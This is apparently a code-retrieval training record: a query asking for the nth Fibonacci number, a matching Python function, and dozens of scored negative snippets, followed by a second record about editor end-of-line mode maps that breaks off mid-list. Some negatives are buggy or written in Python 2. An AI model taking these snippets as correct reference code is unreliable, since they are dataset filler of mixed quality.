Return the nth Fibonacci number
def fibonacci(n): if n in (0,1): return n return (fibonacci(n-2) + fibonacci(n-1))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fibonacci(n):", "def nthFibonacci(n):\n\n # Run some basic error checking\n try:\n n = int(n)\n except: # if this fails not a number inputed\n sys.stderr.write('Incorrect data input\\n')\n return None\n if n < 0:\n sys.stderr.write('Only positive integers allowed\\n')\n return None\n \n # since the error checking slows down the recursion we run it as a seperate function\n [Fnm,Fn] = fastrecursivefibonacci(n)\n return Fnm", "def fibonacci_iterative(nth_nmb: int) -> int:\n old, new = 0, 1\n if nth_nmb in (0, 1):\n return nth_nmb\n for __ in range(nth_nmb - 1):\n old, new = new, old + new\n return new", "def fibi(n):\n a, b = 0, 1\n for i in range(n):\n # fibonacci series is next no. is sum of previous two number.\n temp = a\n a = b\n # now nth fibonacci no. is sum of previous two number.\n b = temp+b\n # returning a because a changing each places\n return a", "def fibi(n):\n if n == 0: return 0\n if n == 1: return 1\n f_n2, f_n1 = 1, 1\n for i in range(3, n+1):\n f_n2, f_n1 = f_n1, f_n2+f_n1\n return f_n1", "def fibonacci(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n nth = fibonacci(n-1) + fibonacci(n-2)\n return nth", "def fib(n:int) -> int:\n if n<= 2:\n return 1\n else:\n return fibonacci.fib(n-1) + fibonacci.fib(n-2)", "def fibi(n: int) -> int:\n if n == 0:\n return 0\n if n == 1:\n return 1\n f_n2, f_n1 = 1, 1\n for _ in range(3, n+1):\n f_n2, f_n1 = f_n1, f_n2+f_n1\n return f_n1", "def fib(n):\n n = int(n)\n if n <= 1:\n return 1\n\n return fib(n-1) + fib(n-2)", "def fast_fibonacci(n):\n return _fast_fibonacci(n)[0]", "def fib(n: int) -> int:\n if n == 0: return 0\n if n == 1: return 1\n return fib(n-1) + fib(n-2)", "def fib(n):\n print(\"fib({})\".format(n))\n if(n <= 2):\n return 1\n else:\n return fib(n-1) + fib(n-2)", "def fib(n):\n if n < 2:\n return n\n else:\n return fib(n-1) + fib(n-2)", "def fibonacci(n):\n if n < 2:\n return n\n return fibonacci(n-1) + fibonacci(n-2)", "def fibonacci(n):\n if n < 2:\n return n\n return fibonacci(n-1) + fibonacci(n-2)", "def fib (n):\r\n if n == 0 or n == 1:\r\n return 1\r\n else:\r\n return fib(n-1) + fib(n-2)", "def fibonacci(n):\n if n < 2:\n return n\n return fibonacci(n - 1) + fibonacci(n - 2)", "def fib(n):\n if n == 0: return 0\n if n == 1: return 1\n return fib(n-1) + fib(n-2)", "def fib(n):\n if n in (0, 1): return n\n return fib(n-1) + fib(n-2)", "def fib(i):\n if i < 2: return 1\n return fib(i-1) + fib(i-2)", "def fib_iterative(n: int) -> int:\n print(n)\n return 0", "def fib(n: int) -> int:\n if n == 0:\n return 0\n if n == 1:\n return 1\n return fib(n-1) + fib(n-2)", "def fibonacci(n):\n if n < 0:\n raise ValueError(\"n cannot be negative\")\n elif n < 2:\n return n\n else:\n a, b = 0, 1\n for _ in range(n):\n a, b = b, add(a, b)\n return a", "def fib(n):\n if n == 1 or n == 2:\n result = 1\n else:\n result = fib(n-1) + fib(n-2)\n return result", "def fib(n): #Describe \"n\" as a variable in fib sequence\n while n == 0:\n return 0 #establish that 0 position is equal to 0\n if n == 1:\n return 1\n else:\n return fib(n-1) + fib(n-2)", "def fibonacci(n):\n if n in (0, 1):\n return n\n return fibonacci(n - 2) + fibonacci(n - 1)", "def fib(n):\n a, b = 1, 1\n while n:\n a, b = b, a + b\n n -= 1\n return a", "def fib(n):\n if n == 0 or n == 1:\n return n\n else:\n return fib(n-2) + fib(n-1)", "def fibonacci(n):\n if n <= 1:\n return n \n else:\n return fibonacci(n-1) + fibonacci(n-2)", "def fibonacci(n):\n print(n)\n if n == 0 or n == 1:\n return 1\n\n return fibonacci(n - 1) + fibonacci(n - 2)", "def fibonacci(n):\n fibval = sum_series(n, 0, 1)\n print(fibval)\n return fibval", "def fibonacci (n):\n\tif n == 0:\n\t\treturn 0\n\telif n == 1:\n\t\treturn 1\n\telse:\n\t\treturn fibonacci(n-2) + fibonacci(n-1)", "def fib_iterative(n: int) -> int:\n if n < 0:\n raise ValueError\n number1 = 0\n number2 = 1\n counter = 1\n while counter < n:\n counter += 1\n number1, number2 = number2, number1 + number2\n return number2", "def fib(n): \n if n == 0:\n return 0\n elif n == 1:\n return 1\n\n else:\n return fib(n-1) + fib(n-2)", "def fib(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fib(n - 2) + fib(n - 1)", "def fib(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fib(n - 1) + fib(n - 2)", "def fibonacci(n):\n\tif n == 0:\n\t\treturn 0\n\telif n == 1:\n\t\treturn 1\n\telse:\n\t\treturn fibonacci(n-1) + fibonacci(n-2)", "def fibonacci_recursive(nth_nmb: int) -> int:\n def fib(_n):\n return _n if _n <= 1 else fib(_n - 1) + fib(_n - 2)\n return fib(nth_nmb)", "def fibonacci(n):\n if n in (0, 1):\n return n\n return (fibonacci(n-2) + fibonacci(n-1))", "def fibonacci(self, n):\n\n if n == 1:\n return 1\n elif n <= 0:\n return 0\n else:\n return self.fibonacci(n - 1) + self.fibonacci(n - 2)", "def fib(n):\n if n == 1:\n return 1\n else:\n return n + fib(n-1)", "def fibonacci(n):\n\tfib_seq = []\n\tnth_term = 0\n\t\n\tfor i in range(0,n+1):\n\t\tif i == 0:\n\t\t\tfib_seq.append(0)\n\t\tif i == 1:\n\t\t\tfib_seq.append(1)\n\t\tif i > 1:\n\t\t\tnth_term = fib_seq[-1] + fib_seq[-2]\n\t\t\tfib_seq.append(nth_term)\n\t\n\tprint(fib_seq)\n\tprint(fib_seq[n])\n\treturn(fib_seq[n])", "def fib3(n):\n if n < 2:\n return n\n return fib1(n-1) + fib1(n-2)", "def fib(n):\n if n==1 or n==2:\n return 1\n else:\n return fib(n-1)+fib(n-2)", "def fibonacci(n):\n\n if n <= 1:\n return n\n else:\n return (fibonacci(n-1) + fibonacci(n-2))", "def fibonacci(n):\n\n if (n == 0):\n return 0\n elif (n == 1):\n return 1\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)", "def fibonacci(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)", "def fibonacci_number(n):\r\n l = [0, 1] \r\n for i in range(n - 1):\r\n l = [*l, l[-1] + l[-2]]\r\n return l[n - 1]", "def fibonacci(n):\n if n == 1:\n return 0\n elif n == 2:\n return 1\n else:\n return fibonacci(n-2) + fibonacci(n-1)", "def fibonacci_term(n):\n return int(((1+sqrt(5))**n-(1-sqrt(5))**n)/(2**n*sqrt(5)))", "def fibonacci(n):\n\n if n == 0:\n return 0\n if n == 1:\n return 1\n \n previous = 0\n current = 1\n\n for i in range(n-1):\n previous, current = current, current + previous\n\n return current", "def find_fib(n):\n # fibo = 2.078087 * math.log(n) + 1.672276\n return 0 # fibo", "def fib(n):\n i = 0\n j = 1\n n = n - 1\n\n while n >= 0:\n i, j = j, i + j\n n = n - 1\n return i", "def fibonacci(n):\r\n\r\n if n in past_fib:\r\n return past_fib[n]\r\n \r\n if n == 0 or n == 1:\r\n past_fib[n] = 1\r\n return 1\r\n\r\n total = fibonacci(n-1) + fibonacci(n-2)\r\n past_fib[n] = total\r\n return total", "def fibonacci(n):\n if n==0 :\n return 0\n elif n==1:\n return 1\n else:\n return fibonacci(n-1) + fibonacci(n-2)", "def fibo(n):\r\n if n==1:\r\n return 0\r\n elif n==2:\r\n return 1\r\n else:\r\n return fibo(n-1)+fibo(n-2)", "def fibonacci(n):\n sequence = [0, 1]\n for i in range(n + 1):\n value = add(sequence[-2], sequence[-1])\n sequence.append(value)\n return sequence[n]", "def fib(n):\n fib = [0, 1]\n if n > 2:\n for i in range(n):\n fib.append(fib[-1] + fib[-2])\n return fib[n-1]\n else:\n return fib[n-1]", "def optimized_fibonacci(f):\n a = 0\n b = 1\n if f < 2:\n return f\n else:\n for i in range(1, f):\n c = a + b\n a = b\n b = c\n return b", "def fibonacci(n):\n\n if n == 1:\n return 1\n elif n < 1:\n return 0\n else:\n return fibonacci(n-1) + fibonacci(n-2)", "def fib_formula(n):\n if n <= 1:\n return n\n else:\n return (fib_formula(n - 1) + fib_formula(n - 2))", "def fibonacci(n):\n assert n >= 0 and int(\n n) == n, 'n has to be greater than or equal to 0 and has to be an integer'\n if n in [0, 1]:\n return n\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)", "def fibonacciN(n):\n previous, current = 1, 1\n k = 2\n while k < n:\n previous, current = current, previous + current\n k += 1\n return current", "def fibonacci(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return (fibonacci(n-1) + fibonacci(n-2))", "def fibonacci(n):\n\n ## Auxiliary functions for working in our polynomial ring.\n def poly_sqr((a, b)):\n a2 = a*a\n return 2*a*b + a2, a2 + b*b\n def poly_mul((a, b), (c, d)):\n ac = a*c\n return a*d + b*c + ac, ac + b*d\n\n ## Do the job. For negative indices, we take powers of t^{-1}.\n if n < 0: return power((1, -1), -n, (0, 1), poly_sqr, poly_mul)\n else: return power((1, 0), n, (0, 1), poly_sqr, poly_mul)", "def fibonacci0(n):\n assert n == int(n) and n > 0\n if n in [1, 2]:\n return 1\n return fibonacci0(n-1) + fibonacci0(n-2)", "def fib(n):\n i = 0\n j = 1\n n = n - 1\n\n while n >= 0:\n i, j = j, i + j\n n = n - 1\n \n return i", "def fib(n):\n i = 0\n j = 1\n n = n - 1\n\n while n >= 0:\n i, j = j, i + j\n n = n - 1\n \n return i", "def fib(n):\n i = 0\n j = 1\n n = n - 1\n\n while n >= 0:\n i, j = j, i + j\n n = n - 1\n \n return i", "def fibonacci_n(n):\n sqrt5 = math.sqrt(5)\n phi = (1 + sqrt5) / 2\n psi = (1 - sqrt5) / 2\n return (phi**n - psi**n) // sqrt5", "def fibonacci(n):\n\n if n == 1:\n v = 0\n elif n == 2:\n v = 1\n else:\n v = fibonacci(n - 2) + fibonacci(n - 1)\n\n return v", "def fibonacci0(n):\n assert n == int(n) and n > 0\n if n in [1, 2]:\n return 1\n return fibonacci0(n-1) + fibonacci0(n-2)", "def fibonacci(n: int) -> int:\n m = 1 << (n.bit_length() - 1)\n Fn = 0\n Fnm1 = 1\n while m:\n Fn2 = Fn * Fn\n Fn = 2 * Fnm1 * Fn + Fn2\n Fnm1 = Fnm1 * Fnm1 + Fn2\n if n & m:\n Fnm1, Fn = Fn, Fnm1 + Fn\n m >>= 1\n return Fn", "def next_fib(f):\n for f in fib:\n i = fib.index(f)\n return f+fib[i-1]", "def fibonacci():\n return sum_series(a=0, b=1)", "def fibonacci(n):\n k, m = 1, 1\n\n if n < 2:\n return n\n\n for i in range(2, n):\n k, m = m, k + m\n\n return m", "def fib(n):\n if n < 0:\n raise ValueError\n\n if n > 1:\n return fib(n - 1) + fib(n - 2)\n\n return n", "def fibonacci(n: int) -> int:\n if n <= 0:\n raise ValueError(\"The number must be greater than zero.\")\n exit(code=1)\n if n == 1:\n return 0\n elif n == 2:\n return 1\n else:\n return fibonacci(n-1) + fibonacci(n - 2)", "def fibonacci1(n):\n if n in (0, 1):\n return n\n return fibonacci1(n - 2) + fibonacci1(n - 1)", "def fibonacci_iter(n):\n f = []\n for x in range(n + 1):\n if x == 0:\n f.append(x)\n elif x == 1:\n f.append(x)\n else:\n f.append(f[-1] + f[-2])\n return f[-1]", "def fib1(n):\n if n < 2:\n return n\n return fib1(n-1) + fib1(n-2)", "def fibonacci(n, a = 0, b = 1):\n if n == 0:\n return a\n elif n == 1:\n return b\n else:\n return fibonacci(n - 1, b, a + b)", "def fib(n): # this line defines the function 'fib' where n is the input value\n i = 0\n j = 1\n n = n - 1\n\n while n >= 0:\n i, j = j, i + j\n n = n - 1\n \n return i", "def fib (n):\n a,b=0,1\n while b<n:\n\tprint b,\n\ta,b = b,a+b", "def fibonacci(n):\n if n <= 1:\n return 1\n n0 = 0\n n1 = 1\n result = 1\n level = 2\n while level <= n:\n result = n0 + n1\n n0 = n1\n n1 = result\n level += 1\n return result", "def fib(n):\n\ta,b=0,1\n\twhile b<n:\n\t\tprint b,\n\t\ta,b=b,a+b", "def fib(n):\n\ta, b = 0, 1\n\twhile a < n:\n\t\tprint a,\n\t\ta, b = b, a+b", "def fibnormal (n):\n\n if n < 3:\n return 1\n f1 = f2 = 1\n for i in range (n-1):\n f3 = f1 + f2\n f1, f2 = f2, f3\n\n return f3", "def get_fibonacci_last_digit_fast(n):\n fibonacci = [0 for i in range(n + 1)]\n fibonacci[1] = 1\n\n for i in range(2, n + 1):\n fibonacci[i] = (fibonacci[i - 1] + fibonacci[i - 2]) % 10\n\n return fibonacci[n]", "def fib(index):\n return round((GR**index)/R5)", "def fibonacci(num):\n if num == 0 or num ==1:\n return 1\n return fibonacci(num-1) + fibonacci (num-2)", "def fibo_element(n):\n f = ()\n if n < 0:\n print(\"Incorrect number\")\n elif n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fibo_element(n-1) + fibo_element(n-2)", "def fib(n):\n global counter\n if n==0 or n==1:\n return 1\n else:\n if n-1==2 or n-2==2:\n counter+=1\n return fib(n-1) + fib(n-2)", "def fibclassic (n):\n\n return 1 if n < 3 else fibclassic (n-2) + fibclassic (n-1)", "def fibi2(n: int) -> int:\n f = [0, 1] + [None for _ in range(2, n+1)]\n for i in range(2, n+1):\n f[i] = f[i-1]+f[i-2]\n return f[n]", "def fibonacci(number: int) -> int:\n fibs = [0] * (number + 2)\n fibs[0] = 0\n fibs[1] = 1\n for i in range(2, number + 1):\n fibs[i] = fibs[i - 1] + fibs[i - 2]\n return fibs[number]", "def fib_recursive(n: int) -> int:\n print(n)\n return 0", "def fib(N):\n sqrt5 = math.sqrt(5)\n phi = (sqrt5 + 1) / 2\n return int(round(math.pow(phi, N) / sqrt5))", "def fib(n):\n a, b = 0, 1\n while b < n:\n print b,\n a, b = b, a+b", "def fib2(n):\n if n <= 2:\n return 1\n i, res = 1, 1\n for _ in range(n - 2):\n i, res = res, res + i\n return res" ]
[ "0.8549428", "0.83808696", "0.8357446", "0.8267962", "0.82505155", "0.8213346", "0.8213339", "0.8212905", "0.81149447", "0.8098057", "0.80716306", "0.8040074", "0.8032861", "0.8029916", "0.8029916", "0.8019259", "0.8019077", "0.8012156", "0.8007875", "0.8001539", "0.79852134", "0.798478", "0.7971879", "0.796173", "0.79607636", "0.7956564", "0.7947912", "0.79437095", "0.7939163", "0.793087", "0.7926684", "0.792416", "0.79177755", "0.7917123", "0.791375", "0.79056567", "0.79043746", "0.790302", "0.79014206", "0.7884692", "0.78817505", "0.7878559", "0.7878249", "0.7870866", "0.78684634", "0.7853879", "0.78508687", "0.7848421", "0.7848355", "0.78410333", "0.7835929", "0.78329885", "0.78276616", "0.781293", "0.78108233", "0.7807304", "0.7806639", "0.78050643", "0.7802335", "0.77912503", "0.7791148", "0.7784265", "0.77827543", "0.77812916", "0.7771224", "0.77694684", "0.7767021", "0.7767021", "0.7767021", "0.7756825", "0.77567786", "0.7749564", "0.7724282", "0.77222544", "0.77169573", "0.7709786", "0.7707383", "0.7706818", "0.76979643", "0.76971465", "0.7690063", "0.7678807", "0.7673536", "0.7662299", "0.7655996", "0.7653059", "0.76496464", "0.7639371", "0.7636822", "0.7633434", "0.76321936", "0.76279294", "0.76244855", "0.7597176", "0.7591671", "0.75871646", "0.75850254", "0.7578626", "0.7568075", "0.75604355" ]
0.78968835
39
Get the eol mode map
def EOLModeMap(): # Maintenance Note: ints must be kept in sync with EDSTC_EOL_* in edstc return { EOL_MODE_CR : _("Old Machintosh (\\r)"), EOL_MODE_LF : _("Unix (\\n)"), EOL_MODE_CRLF : _("Windows (\\r\\n)")}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_eol_for_open(self) -> str:\n map = {\n EOLTypes.CRLF: WINDOWS_EOL,\n EOLTypes.LF: UNIX_EOL,\n EOLTypes.NATIVE: linesep,\n }\n\n return map[self]", "def get_modes(self):\n return [i for i, j in enumerate(self._modemap._map) if j is not None]", "def getModeLookupTable(self):\n mode_table = []\n header = None\n for line in open(PublicTransit.MODE_LOOKUP_FILE_NAME):\n line = line.strip()\n if len(line) == 0: \n continue\n line = map(str.strip,line.split(\",\"))\n if header is None:\n header = line\n #CPT_AGENCYID\tAGENCYNAME\tCPT_MODE\tSCH_ROUTEDESIGNATOR\tMODECODE\tMODEGROUP\n continue\n data = {}\n for i in range(len(line)):\n data[header[i]] = line[i]\n mode_table.append(data)\n return mode_table", "def _get_modes(self):\n return self.__modes", "def get_modes(self, code_block):\r\n # FUCK YOU INDEX ERRORS, LIST COMPS, AND EVEN YOU LAMBDAS I DON'T NEED PRETTY\r\n # 0 = pos mode\r\n # 1 = imm mode\r\n modes, mode_codes = [0, 0], list(reversed(str(code_block[0])))[2:]\r\n x = 0\r\n for mode in mode_codes:\r\n modes[x] = int(mode)\r\n x += 1\r\n print('Get modes: ')\r\n print(modes)\r\n return modes", "def get_modes(self):\n return self.circuit.get_modes()", "def modes(self, exp_id: int) -> List[str]:\n return list(self.state[exp_id].keys())", "def __mode_modesetid(self, mode):\n\t\tfor key,val in self.ms_all.iteritems():\n\t\t\tix = val.index(mode)\n\t\t\tif ix is not None:\n\t\t\t\treturn key, ix", "def all_modes(self):\n\n # Find \"post-proj all modes\"\n # Jump to first value, ignoring text.\n # Move through data, adding it to a list\n # continue onto next line.\n # Repeat until the following line is known to be empty.\n\n # output.dat is the psi4 output file.\n with open('output.dat', 'r') as file:\n lines = file.readlines()\n for count, line in enumerate(lines):\n if \"post-proj all modes\" in line:\n start_of_vals = count\n break\n else:\n raise EOFError('Cannot locate modes in output.dat file.')\n\n # Barring the first (and sometimes last) line, dat file has 6 values per row.\n end_of_vals = start_of_vals + (3 * len(self.molecule.molecule['input'])) // 6\n\n structures = lines[start_of_vals][24:].replace(\"'\", \"\").split()\n structures = structures[6:]\n\n for row in range(1, end_of_vals - start_of_vals):\n # Remove double strings and weird formatting.\n structures += lines[start_of_vals + row].replace(\"'\", \"\").replace(\"]\", \"\").split()\n\n all_modes = [float(val) for val in structures]\n\n return array(all_modes)", "def _get_applicable_modes(command):\n mode_dict = {}\n _add_applicable_modes(command, mode_dict)\n return mode_dict.keys()", "def parse_session_mode_and_map(log_data):\n try:\n match = search(\n r\"<\\d{2}:\\d{2}> [^d]* Loading level \\w+\\/(\\w+), \\w+ (\\w+)\",\n log_data)\n line_map, line_mode = match.groups()\n return (line_mode, line_map)\n except Exception:\n print(\"Something is wrong with the log file!\")", "def modes(self):\n return np.hstack(tuple(self.operator.modes))", "def all_modes(self):\n\n # Find \"post-proj all modes\"\n # Jump to first value, ignoring text.\n # Move through data, adding it to a list\n # continue onto next line.\n # Repeat until the following line is known to be empty.\n\n # output.dat is the psi4 output file.\n with open(\"output.dat\", \"r\") as file:\n lines = file.readlines()\n for count, line in enumerate(lines):\n if \"post-proj all modes\" in line:\n start_of_vals = count\n break\n else:\n raise EOFError(\"Cannot locate modes in output.dat file.\")\n\n # Barring the first (and sometimes last) line, dat file has 6 values per row.\n end_of_vals = start_of_vals + (3 * len(self.molecule.atoms)) // 6\n\n structures = lines[start_of_vals][24:].replace(\"'\", \"\").split()\n structures = structures[6:]\n\n for row in range(1, end_of_vals - start_of_vals):\n # Remove double strings and weird formatting.\n structures += (\n lines[start_of_vals + row].replace(\"'\", \"\").replace(\"]\", \"\").split()\n )\n\n all_modes = [float(val) for val in structures]\n\n return np.array(all_modes)", "def __convertEOL(self):\n aw = self.activeWindow()\n aw.convertEols(aw.eolMode())", "def get_modes(self):\n modes = set()\n for er in self.exercise_recordings:\n if er.mode not in modes:\n modes.add(er.mode)\n return list(modes)", "def modes(self) -> List[str]:\n return [m.name for m in self._modes]", "def GetPackageModes(self):\n return self._modes", "def values(self):\n return self._modes.values()", "def get_focus_mode_names(self):\n names = []\n for focus_mode in self.focus_modes:\n names.append(focus_mode['modeName'])\n return names", "def _modes(self):\n answer = []\n for i in dir(self):\n if i.startswith('handle_'):\n answer.append(i.replace('handle_', ''))\n return answer", "def _get_mode(self):\n self._validate_mode()\n return deepcopy(self.mode)", "def common_mode(self):\n return self._common_mode", "def common_mode(self):\n return self._common_mode", "def getmode(self, mode):\r\n modes = {}\r\n # core modes\r\n for m, (basemode, basetype, bands) in _MODEINFO.items():\r\n modes[m] = ModeDescriptor(m, bands, basemode, basetype)\r\n # extra experimental modes\r\n modes[\"RGBa\"] = ModeDescriptor(\"RGBa\",\r\n (\"R\", \"G\", \"B\", \"a\"), \"RGB\", \"L\")\r\n modes[\"LA\"] = ModeDescriptor(\"LA\", (\"L\", \"A\"), \"L\", \"L\")\r\n modes[\"La\"] = ModeDescriptor(\"La\", (\"L\", \"a\"), \"L\", \"L\")\r\n modes[\"PA\"] = ModeDescriptor(\"PA\", (\"P\", \"A\"), \"RGB\", \"L\")\r\n # mapping modes\r\n modes[\"I;16\"] = ModeDescriptor(\"I;16\", \"I\", \"L\", \"L\")\r\n modes[\"I;16L\"] = ModeDescriptor(\"I;16L\", \"I\", \"L\", \"L\")\r\n modes[\"I;16B\"] = ModeDescriptor(\"I;16B\", \"I\", \"L\", \"L\")\r\n # set global mode cache atomically\r\n _modes = modes\r\n return _modes[mode]", "def line_styles (self):\n return self._line_styles", "def get_map(self):\n\n self.mp = defaultdict(lambda : ord('x'))\n y, x = 0, 0\n while True:\n cond, output = self.ic()\n\n if cond: break\n # New row of the print out\n if output == 10:\n y += 1\n x = 0\n # Assign the value to the map\n else:\n self.mp[y,x] = output\n x += 1\n \n return self.mp", "def get_keymap(self):\n return self.keymap", "def keys(self):\n return self._modes.keys()", "def _get_mode(self):\n raise NotImplementedError", "def get_all_color_modes(self):\n return self._all_color_modes", "def preset_modes(self):\n return self._preset_modes", "def get_mode(self) -> str:\n\n return self.send(self.cmd.GET_MODE)", "def map_rule4(self):\n odml.terminology.terminologies['map'] = parse(\"\"\"\n S1[T1]\n - P2\n S2[T2]\n - P1\n S3[T3]\n - P1\n - P2\n - P3\n \"\"\")", "def get_heatmode_stringlist(self):\n return text_heatmode", "def get_current_mode(self):\n return self.read(0xa2)", "def get_mode(self):\n summary = self.get_version_summary()\n pattern = '\\$.*? .*? (.*?) .*? .*? .*? .*? .*? .*? \\r\\n' \n mode = re.findall(pattern,summary).pop()\n return mode", "def get_keymap(lines: str):\n parsed = [line for line in lines.split(\"\\n\") if line]\n\n start = end = 0\n for i, line in enumerate(parsed):\n if \"qmkformat start\" in line:\n start = i + 1\n if \"qmkformat end\" in line:\n end = i\n break\n\n layout = \"\".join(parsed[start:end])\n return layout[layout.find(\"{\") + 1 : layout.find(\"}\")]", "def default_trace_codes() -> Mapping[int, str]:\n with open(Path(__file__).resolve().parent.joinpath('trace.codes'), 'r') as fd:\n return from_trace_codes_text(fd.read())", "def GetMapMode(*args, **kwargs):\n return _gdi_.DC_GetMapMode(*args, **kwargs)", "def raw_mode(self) -> ContextManager[None]:", "def modes(self):\n try:\n order = self._current_order\n except AttributeError:\n raise AttributeError('Cannot iterate over modes without iterating over orders!') from None\n mode = -order\n while mode <= order:\n yield mode\n mode += 1", "def config_mode(self):\n return \"\"", "def ActiveHlt2Lines(self) :\n return []", "def get_mode(self):\r\n return self._api.get_mode()", "def getDisplayModes(self, obj):\n modes = []\n return modes", "def getColorMapFlags():\n\treturn colorMap_flag", "def get_pers_modes(self, pcut):\n return self.get_allpers_modes()[pcut]", "def get_all_servers_modes():\n return _get_list(\n lambda server: server.mode,\n lambda server: server.mode_name_long\n )", "def getmode(self):\n return self.mode", "def cursor_mode(self):\n return self._cursor_mode", "def preset_modes(self) -> Optional[List[str]]:\n return [PRESET_MODE_WHOOSH]", "def find_mode_range(self):\n\n if (len(self.n) < 1): return -1,-1,-1,-1\n nmin = np.nanmin(self.modes['n'])\n nmax = np.nanmax(self.modes['n'])\n lmin = np.nanmin(self.modes['l'])\n lmax = np.nanmax(self.modes['l'])\n return nmin, nmax, lmin, lmax", "def mode(self):\n return self._lift(\"mode\")", "def get_lines(self) -> list[str]:\n\n chars = self.get_char(\"border\")\n assert isinstance(chars, list)\n left_border, _, right_border, _ = chars\n\n lines = super().get_lines()\n last_line = lines.pop()\n\n for line in range(256 // self.grid_cols):\n buff = left_border\n\n for num in range(self.grid_cols):\n col = str(line * self.grid_cols + num)\n if col == \"0\":\n buff += \" \"\n continue\n\n buff += self._layer_functions[self.layer](f\"{col:>3}\", col) + \" \"\n\n buff = buff[:-1]\n lines.append(buff + \"\" + right_border)\n\n lines.append(last_line)\n\n return lines", "def preset_modes(self) -> list:\n return self._preset_modes", "def get_mode(self):\r\n return self.mode", "def get_mode(state):\n node = state\n for key in (\"layers\", \"mode\"):\n node = node.get(key, {})\n return node.get(\"state\", \"add\")", "def getSchemaMap(self):\n\t\trSchemaMap = {}\n\t\tfor schemaName in self.schemaList:\n\t\t\tmodeList = [str(tKey) for tKey in self.schemaList[schemaName].modes.keys()]\n\n\t\t\tif len(modeList) == 1 and None in self.schemaList[schemaName].modes:\n\t\t\t\trSchemaMap[schemaName] = 0\n\t\t\telse:\n\t\t\t\trSchemaMap[schemaName] = modeList\n\n\t\treturn rSchemaMap", "def supported_modes(self):\n return [OFF, SYNC, CHARGE]", "def modesets(self):\n\t\tcopy_ms_all = {}\n\t\tfor mode_set_id,mode_set in self.ms_all.iteritems():\n\t\t\tcopy_ms_all[mode_set_id] = copy.deepcopy(mode_set.simple())\n\t\treturn copy_ms_all", "def get_macros(self):\n return LEVELS.keys()", "def _get_mode():\n return context.get_context('mode')", "def lines(self):\n if not PY2:\n return self.curbuf\n\n return [l.decode(self.options.get('encoding')) for l in self.curbuf]", "def mode(self) -> str:\r\n ...", "def geef_kolom_keuzes(self):\n return self._kolom_codelijst.geef_terminals()", "def getMode(self):\n return self._mode", "def _get_app_flags_mode(self, string):\n\n app = ''\n flags = ''\n mode = 0\n split = string.split()\n\n if len(split) == 0:\n pass\n\n elif len(split) == 1:\n part = split[0]\n if self._is_app(part):\n app = part\n elif self._is_flags(part):\n flags = part\n elif self._is_mode(part):\n mode = part\n\n elif len(split) == 2:\n part0 = split[0]\n part1 = split[1]\n\n if self._is_app(part0):\n app = part0\n if self._is_flags(part1):\n flags = part1\n elif self._is_mode(part1):\n mode = part1\n elif self._is_flags(part0):\n flags = part0\n if self._is_mode(part1):\n mode = part1\n elif self._is_mode(part0):\n mode = part0\n if self._is_flags(part1):\n flags = part1\n\n elif len(split) >= 3:\n part0 = split[0]\n part1 = split[1]\n part2 = split[2]\n\n if self._is_app(part0):\n app = part0\n if self._is_flags(part1):\n flags = part1\n if self._is_mode(part2):\n mode = part2\n elif self._is_mode(part1):\n mode = part1\n if self._is_flags(part2):\n flags = part2\n elif self._is_flags(part0):\n flags = part0\n if self._is_mode(part1):\n mode = part1\n elif self._is_mode(part0):\n mode = part0\n if self._is_flags(part1):\n flags = part1\n #Always run in new window\n flags = 'f'\n return app, flags, int(mode)", "def getting_flags_locations(self):\n print(self.flags)\n self.line_finder.find_line(self.html)", "def read_all_status_characters(self):\n return self.STATUS_CHARACTERS", "def get_modes_of_operation(self):\n return [\"Online\", \"Offline\"]", "def getZaptelConf(self):\n output = []\n for portInd, portLine in enumerate(self.portLines):\n if self[portInd]['type'] != 'na':\n values = self[portInd]\n values['type'] = values['type'] == 'fxs' and \"fxo\" or 'fxs' #Hmm crazy zaptel idea that your fxo is your fxs in zapata but the correct way around in zaptel\n output.append(\"%(type)s%(signalling)s=\" % self[portInd] + str(portLine[0]))\n return output", "def getVKBEditMode(self):\r\n return eval(self.phone.sx('(send (get-text-editor-manager) get-edit-mode)', convertToString=True).title())", "def mapping_description(self):\n\n mapping_description_lines = []\n\n if self.valuemap:\n for value in sorted(self.valuemap.keys()):\n mapping = self.valuemap[value]\n mapping_description_lines.append(\"'{}' <-> '{}'\\n\".format(value, mapping))\n return mapping_description_lines", "def GetEOLChar(self):\n m_id = self.GetEOLMode()\n if m_id == wx.stc.STC_EOL_CR:\n return u'\\r'\n elif m_id == wx.stc.STC_EOL_CRLF:\n return u'\\r\\n'\n else:\n return u'\\n'", "def getCharMapping(tweets):\n text = map(lambda x: x.getText(), tweets)\n allChars = [c for s in text for c in s]\n x = collections.Counter(allChars)\n chars_used = x.most_common()[:max_chars]\n charset = map(lambda x: x[0], chars_used)\n # Add padding, start, end and unknown characters\n mapping = dict((c, i) for i, c in enumerate(charset + ['<s>', '</s>', '<pad>', '<unknown>', '<unknown_test>']))\n dump(mapping, open(char_mapping_filename, 'wb'))\n return mapping", "def exit_config_mode(self):\n return \"\"", "def get_lines():\n buf = vim.current.buffer\n return buf", "def _get_lsp_config_path_select_mode_configured(self):\n return self.__lsp_config_path_select_mode_configured", "def partial_modes(self, level, node=None):\n if node:\n return self.operator.modes[self._index_list(level, node)]\n\n indeces = [self._index_list(level, i) for i in range(2**level)]\n return np.hstack(tuple([self.operator.modes[idx] for idx in indeces]))", "def _generate_character_map(self):\n self._ct = [-1] * 256\n index = 0\n for c_range in self._meta.character_ranges:\n for c_pos in range(c_range['min'], c_range['max'] + 1):\n self._ct[c_pos] = index\n index += 1", "def get_color_mode(self):\n mode=lib.is_SetColorMode(self.hcam,0x8000)\n return self._color_modes_inv.get(mode,mode)", "def formats(self):\n return self._map.keys()", "def ActiveHlt2Lines(self) :\n lines = [\n 'Hlt2B2HH',\n 'Hlt2B2PiPi',\n 'Hlt2B2KPi',\n 'Hlt2B2KK',\n 'Hlt2Lb2PK',\n 'Hlt2Lb2PPi'\n ]\n\n return lines", "def 